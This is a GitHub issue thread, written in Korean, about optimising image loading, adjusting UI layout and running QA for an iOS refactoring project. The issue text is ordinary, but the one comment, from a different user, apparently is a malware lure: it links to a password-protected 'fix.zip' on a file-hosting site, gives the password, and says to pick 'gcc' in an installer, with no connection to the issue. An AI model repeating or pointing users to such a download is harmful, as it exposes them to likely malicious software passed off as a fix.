### ISSUE TITLE
FIX: 이미지 로직 개선 및 QA 검증

### ISSUE THREAD

**Issue by angryeon7** [Wake-up-together-TogetUp/Togetup-iOS-Refactoring#46]
## Issue

* 이미지 로딩 및 처리 로직을 최적화하여 성능을 향상시키고, 로딩 속도를 개선
*  UI 레이아웃 추가
* QA 반영
## To-do

- [ ] UI 레이아웃 및 스타일 수정
- [ ] 이미지 로직 최적화
- [ ] QA 테스트 및 검증 진행

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
